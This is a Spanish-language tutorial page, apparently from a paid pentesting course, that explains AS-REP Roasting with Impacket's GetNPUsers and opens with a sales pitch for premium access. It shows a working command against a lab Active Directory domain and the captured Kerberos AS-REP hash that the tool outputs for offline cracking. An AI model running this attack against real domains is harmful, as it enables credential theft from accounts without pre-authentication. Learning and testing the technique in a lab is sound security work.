Utilizando Impacket-GetNPUsers

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!

"Impacket-GetNPUsers" es una herramienta dentro de la suite de herramientas Impacket, que está diseñada para explotar una condición específica en los entornos de Active Directory (AD) que utilizan el protocolo de autenticación Kerberos. Esta herramienta se utiliza para el ataque conocido como "AS-REP Roasting", que está relacionado con la vulnerabilidad que se presenta cuando las cuentas de usuario tienen la preautenticación de Kerberos deshabilitada, como se explicó en la descripción del "KRB_AS_REP Roasting".

impacket-GetNPUsers 'spartancybersec.corp/asrep.user' -no-pass -dc-ip 18.116.10.36  -request 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for asrep.user
$krb5asrep$23$asrep.user@SPARTANCYBERSEC.CORP:dcf2e70787d82c285a3352d33f830da8$abaa745eb4f3eb3cdbe6d41248bde2a8dd6f3ae128c0fc83c92f85a3c27c82b539cac5aa8d95bb3840899231996b057ded16871fce41c09a43830efa4cd76a9712beb0d4f286bf21d42a5f60ba8d597c015e8ca8f802a7e5685415c3aa79a1031a39aabd2ce1bc4365a785764550c5a7353e8b5535f23c2c06d7cc305b8375bfb567747756bada5ce1c50c4b4943dad7efb5969a8ba1360358bd1d40222b13e784f2b5f1dcae3cc2bba14d5e3ca947f60d6c41060c4b8a9d2d02e37cc9b9899077dfa05a211d7eef7b631c92c682ff100d4d6faa94251a84aaf244984ae4f8500d21a97be31e85d4ab6c9b03f3b97b65aadf6ed6b897e06a0ed63a33

AnteriorUtilizando CrackMapExec SiguienteCVE-2022-33679

Última actualización hace 3 meses